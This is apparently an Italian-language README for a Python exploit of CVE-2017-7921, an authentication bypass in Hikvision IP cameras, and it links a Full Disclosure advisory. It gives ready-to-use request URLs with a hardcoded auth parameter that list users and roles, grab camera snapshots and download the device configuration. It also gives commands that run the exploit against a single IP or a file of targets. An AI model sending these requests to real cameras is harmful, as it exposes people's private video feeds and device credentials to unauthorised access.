
Exploit Python per CVE-2017-7921 nelle telecamere IP Hikvision, che esegue enumerazione utenti non autenticata, cattura di snapshot e download del file di configurazione tramite richieste HTTP appositamente create.
È stato scoperto un problema di autenticazione impropria nei dispositivi Hikvision.
La vulnerabilità di autenticazione impropria si verifica quando un'applicazione non autentica gli utenti in modo adeguato o corretto.
Ciò può consentire a un utente malintenzionato di aumentare i propri privilegi sul sistema e ottenere accesso a informazioni sensibili.
https://seclists.org/fulldisclosure/2017/Sep/23
Dettagli della vulnerabilità:
----------------------
Recupera un elenco di tutti gli utenti e dei loro ruoli:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Ottieni un'istantanea della telecamera senza autenticazione:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
E, cosa peggiore, si può scaricare la configurazione della telecamera:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
